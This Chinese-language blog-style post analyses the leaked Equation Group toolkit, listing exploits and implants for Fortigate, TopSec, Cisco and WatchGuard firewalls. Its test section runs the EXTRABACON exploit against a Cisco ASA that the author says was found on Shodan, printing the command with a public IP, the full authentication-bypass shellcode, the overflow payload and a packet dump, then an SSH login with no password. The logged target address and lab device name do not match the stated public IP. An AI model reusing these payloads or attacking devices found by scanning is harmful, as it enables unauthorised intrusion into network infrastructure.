Equation Group（NSA合作黑客组织）的攻击工具分析

背景

Equation Group是一家和NSA(美国国家安全局)关系密切的黑客组织，被另一黑客组织ShadowBrokers(下面简称SB，怪怪的...)所攻击，并将EG的工具公布出来。

这次可以下载的包含两部分文件，一个是公布出来的PoC，另外一部分是加密的拍卖文件。

要公开这部分加密文件，SB宣称需要往他们比特币账户打一百万比特币。对于这么庞大的数字，猜测应该不是真的为了钱？！

还原事件过程，SB最先将文件放在Github上，通过Github公开事件接口可以看到SB的Github动态。

2016-08-06 （创建Github账号）
2016-08-13（上传的EQGRP文件）
2016-08-15（关闭仓库，无法下载）

另外可以看到该Github注册的邮箱[email protected]，tutanota是一款安全性较高专注加密的邮箱，还被ISIS定义为圣战产品用来防止反监听。

下载

最开始公开在SB的Github上，但后来就关掉了，目前还可以在Mega上下载到。

Mega上的EQGRP-Auction-Files.zip下载下来解压后的文件

$ ls
128M  eqgrp-auction-file.tar.xz.gpg # 拍卖资源，密钥未公布，无法解密  
819B eqgrp-auction-file.tar.xz.gpg.sig  
182M eqgrp-free-file.tar.xz.gpg # 公布的PoC文件  
819B eqgrp-free-file.tar.xz.gpg.sig  
3.0K public.key.asc  
190B sha256sum.txt  
819B sha256sum.txt.sig

解密eqgrp-free-file.tar.xz.gpg文件

# 输入密码(theequationgroup)
gpg --decrypt --output eqgrp-free-file.tar.xz eqgrp-free-file.tar.xz.gpg

# 解压压缩包
tar -xf eqgrp-free-file.tar.xz

最终文件结构(目录)

$ tree -d
Firewall  
├── BANANAGLEE
│   ├── BANANAUSURPER
│   │   ├── BG2200_UPGRADE
│   │   │   └── UPGRADE
│   │   ├── BG3000_UPGRADE
│   │   │   └── UPGRADE
│   │   ├── BG3100_UPGRADE
│   │   │   └── UPGRADE
│   │   └── BG3121_UPGRADE
│   │       └── UPGRADE
│   ├── BG2100
│   ├── BG2200
│   ├── BG3000
│   ├── BG3100
│   └── BG3121
├── BARGLEE
│   └── BARGLEE3100
├── BLATSTING
│   ├── BLATSTING_20040x
│   ├── BLATSTING_20082
│   ├── BLATSTING_201280
│   ├── BLATSTING_201381
│   ├── BLATSTING_20322
│   ├── BLATSTING_20622
│   └── BLATSTING_21680
├── BUZZDIRECTION
│   ├── BUZZ_1120
│   └── BUZZ_1210
├── EXPLOITS - 利用工具
│   ├── EGBL
│   ├── ELBA
│   ├── ELBO
│   ├── ELCA
│   ├── ELCO
│   ├── EPBA
│   ├── ESPL
│   └── EXBA
├── OPS
├── SCRIPTS - 脚本
│   └── fw_wrapper
├── TOOLS - 工具
│   ├── Apache
│   ├── BenignCertain
│   │   ├── benigncertain-v1100
│   │   └── benigncertain-v1110
│   ├── DurableNapkin
│   ├── NOPEN
│   ├── ike-scan
│   ├── tftpd
│   └── thttpd
│       └── httptmp
└── TURBO
    ├── PIT
    └── TX

翻看了下文件，发现大部分是针对路由器、防火墙以及安全产品的攻击，大部分文件创建于2010年。

很多工具命令都是简写，只能通过注释、目标探测方式来判断作用。

利用工具(EQGRP-Auction-Files/Firewall/EXPLOITS/)缩写解释

EGBL = EGREGIOUS BLUNDER (Fortigate防火墙 + HTTPD exploit (apparently 2006 CVE )  
ELBA = ELIGIBLE BACHELOR  
ELBO = ELIGIBLE BOMBSHELL (天融信(TOPSEC)防火墙 versions 3.3.005.057.1 to 3.3.010.024.1)  
ELCA = ELIGIBLE CANDIDATE  
ELCO = ELIGIBLE CONTESTANT  
EPBA = EPIC BANANA  
ESPL = ESCALATE PLOWMAN  
EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4)  
BANANAGLEE = Juniper Netscreen Devices  
BARGLEE  
BLATSTING  
BUZZDIRECTION  
SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100)  
BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)

作用

Exploits

我们天朝大国的天融信(TopSec)防火墙这下是出名了。

EGREGIOUSBLUNDER
- 目标：Fortigate防火墙
- 漏洞：远程代码执行（利用HTTP Cookie覆盖）
- 影响：涉及到60, 60M, 80C, 200A, 300A, 400A, 500A, 620B, 800, 5000, 1000A, 3600, 3600A等版本。
ELIGIBLEBACHELOR
- 目标：天融信防火墙
- 漏洞：未知
- 影响：涉及到 3.2.100.010, 3.3.001.050, 3.3.002.021， 3.3.002.030等版本。
ELIGIBLEBOMBSHELL
- 目标：天融信防火墙
- 漏洞：远程代码执行（HTTP Cookie命令注入）
- 影响：涉及3.2.100.010.1pbc17iv3到3.3.005.066.1
WOBBLYLLAMA
- 目标：天融信防火墙
- 漏洞：未知
- 影响： 3.3.002.030.8_003（开发版）
FLOCKFORWARD
- 目标：天融信防火墙
- 漏洞：未知
- 影响：3.3.005.066.1（开发版）
HIDDENTEMPLE
- 目标：天融信防火墙
- 漏洞：未知
- 影响：tos_3.2.8840.1（开发版）
CONTAINMENTGRID
- 目标：天融信防火墙
- 漏洞：未知
- 影响：tos_3.3.005.066.1（开发版）
CONTAINMENTGRID
- 目标：天融信防火墙
- 漏洞：未知
- 影响：3.2.100.010.8pbc27（开发版）
ELIGIBLECANDIDATE
- 目标：天融信防火墙
- 漏洞：远程代码执行（基于HTTP Cookie命令注入）
- 影响：3.3.005.057.1 到 3.3.010.024.1
ELIGIBLECONTESTANT
- 目标：天融信防火墙
- 漏洞：远程代码执行（基于HTTP POST参数注入）
- 影响：3.3.005.057.1 到 3.3.010.024.1
EPICBANANA
- 目标：思科ASA、思科PIX
- 漏洞：默认密码（cisco）
- 影响：ASA（711, 712, 721, 722, 723, 724, 80432, 804, 805, 822, 823, 824, 825, 831, 832 ）、PIX（711, 712, 721, 722, 723, 724, 804）
ESCALATEPLOWMAN
- 目标：WatchGuard防火墙
- 漏洞：注入代码（通过ifconfig命令）
- 影响：未知
EXTRABACON
- 目标：思科ASA
- 漏洞：远程代码执行
- 影响：版本802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844
BOOKISHMUTE
FALSEMOREL

Implants

大部分用作植入某类防火墙的固件

BLATSTING
BANANAGLEE
BANANABALLOT
BEECHPONY
JETPLOW
SCREAMINGPLOW
BARGLEE
BUZZDIRECTION
FEEDTROUGH
JIFFYRAUL
BANNANADAIQUIRI
POLARPAWS
POLARSNEEZE

Tools

BILLOCEAN 检测防火墙序列号

FOSHO 一个Python库，用来创建利用的HTTP请求

BARICE 植入工具

DURABLENAPKIN 在局域网内注入数据包

BANANALIAR 植入工具

PANDAROCK 植入工具

SECONDDATE 针对思科 PIX设备的包注入

TEFLONDOOR 一个能自毁的程序

1212/DEHEX 转换hexademical字符串到目标服务器

XTRACTPLEASING 提取一些东西产生一个PCAP文件

NOPEN 有客户端和服务端，通过RC6对数据加密。

测试

测试下第13个EXTRABACON（位置在EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA）

目标需要达到以下要求：

Cisco ASA防火墙
版本号802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844
开启了SNMAP（161端口可外部访问）

先安装下依赖

Mac OS X下按照下面操作，其它的参照Scapy

# Scapy
$ sudo port -d selfupdate
$ sudo port install scapy

# libdnet
$ wget http://libdnet.googlecode.com/files/libdnet-1.12.tgz
$ tar xfz libdnet-1.12.tgz
$ ./configure
$ make
$ sudo make install
$ cd python
$ python2.5 setup.py install

# pylibpcap
$ wget http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.2.tar.gz
$ tar xfz pylibpcap-0.6.2.tar.gz
$ cd pylibpcap-0.6.2
$ python2.5 setup.py install

# Readline
$ python `python -c "import pimp; print pimp.__file__"` -i readline

在Shodan上挑一台Cisco ASA并且开了SNMP的防火墙（这个条件的真不好找:<）

$ cd EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA/
$ python extrabacon_1.1.0.1.py exec -c pubString --mode pass-disable -t 86.43.107.74
WARNING: No route found for IPv6 destination :: (no default route?)  
Logging to /Volumes/Statics/Security/EquationGroup/EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA/concernedparent  
[+] Executing:  extrabacon_1.1.0.1.py exec -c pubString --mode pass-disable -t 86.43.107.74
[+] probing target via snmp
[+] Connecting to 86.43.107.74:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>  community = <ASN1_STRING['pubString']>  PDU       
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>   |  error     = <ASN1_INTEGER[0L]>   |  error_index= <ASN1_INTEGER[0L]>   |  varbindlist
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>   |   |  value     = <ASN1_TIME_TICKS[9300L]>   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>   |   |  value     = <ASN1_STRING['LAB-ASA']>[+] firewall uptime is 9300 time ticks, or 0:01:33

[+] firewall name is LAB-ASA

[+] target is running asa842, which is supported
Data stored in key file  : asa842  
Data stored in self.vinfo: ASA842  
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3  
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3  
[+] random SNMP request-id 59358486
[+] fixing offset to payload 53
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.53.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144  
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3  
EXBA msg (373): 308201710201010409707562537472696e67a582015f02040389bd160201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000435817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500  
[+] Connecting to 10.1.1.250:161
[+] packet 1 of 1
[+] 0000   30 82 01 71 02 01 01 04  09 70 75 62 53 74 72 69   0..q.....pubStri
[+] 0010   6E 67 A5 82 01 5F 02 04  03 89 BD 16 02 01 00 02   ng..._..........
[+] 0020   01 01 30 82 01 4F 30 81  91 06 07 2B 06 01 02 01   ..0..O0....+....
[+] 0030   01 01 04 81 85 BF A5 A5  A5 A5 B8 D8 A5 A5 A5 31   ...............1
[+] 0040   F8 BB A5 25 F6 AC 31 FB  B9 A5 B5 A5 A5 31 F9 BA   ...%..1......1..
[+] 0050   A2 A5 A5 A5 31 FA CD 80  EB 14 BF F0 8F 53 09 31   ....1........S.1
[+] 0060   C9 B1 04 FC F3 A4 E9 0C  00 00 00 5E EB EC E8 F8   ...........^....
[+] 0070   FF FF FF 31 C0 40 C3 BF  A5 A5 A5 A5 B8 D8 A5 A5   ...1.@..........
[+] 0080   A5 31 F8 BB A5 B5 AD AD  31 FB B9 A5 B5 A5 A5 31   .1......1......1
[+] 0090   F9 BA A2 A5 A5 A5 31 FA  CD 80 EB 14 BF E0 13 08   ......1.........
[+] 00a0   08 31 C9 B1 04 FC F3 A4  E9 0C 00 00 00 5E EB EC   .1...........^..
[+] 00b0   E8 F8 FF FF FF 31 C0 40  C3 C3 30 81 B8 06 81 B3   [email protected].....
[+] 00c0   2B 06 01 04 01 09 09 83  6B 01 03 03 01 01 05 09   +.......k.......
[+] 00d0   5F 81 38 43 7B 7A 81 2D  35 81 25 81 25 81 25 81   _.8C{z.-5.%.%.%.
[+] 00e0   25 81 03 81 6C 04 81 09  04 24 81 09 81 65 81 03   %...l....$...e..
[+] 00f0   81 45 48 31 81 40 31 81  5B 81 33 10 31 81 76 81   .EH1.@1.[.3.1.v.
[+] 0100   3F 81 2E 81 2A 81 2A 81  2A 81 01 81 77 81 25 81   ?...*.*.*...w.%.
[+] 0110   25 81 25 81 25 60 81 0B  81 04 24 81 60 01 00 00   %.%.%`....$.`...
[+] 0120   04 35 81 7F 81 50 61 81  43 81 10 81 10 81 10 81   .5...Pa.C.......
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0160   10 19 47 14 09 81 0B 7C  24 14 81 0B 07 81 7F 81   ..G....|$.......
[+] 0170   60 81 10 05 00                                     `....
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>  community = <ASN1_STRING['pubString']>  PDU       
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[59358486L]>   |  error     = <ASN1_INTEGER[0L]>   |  error_index= <ASN1_INTEGER[0L]>   |  varbindlist
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.112.117.98.83.116.114.105.110.103.46.49.48.46.49.46.49.46.51.46.50']>   |   |  value     = <ASN1_STRING['']>[+] received SNMP id 59358486, matches random id sent, likely success
[+] clean return detected
{gfm-js-extract-pre-7}
$ ssh [email protected]
[email protected]'s password:  
Type help or '?' for a list of available commands.  
LAB-ASA> ?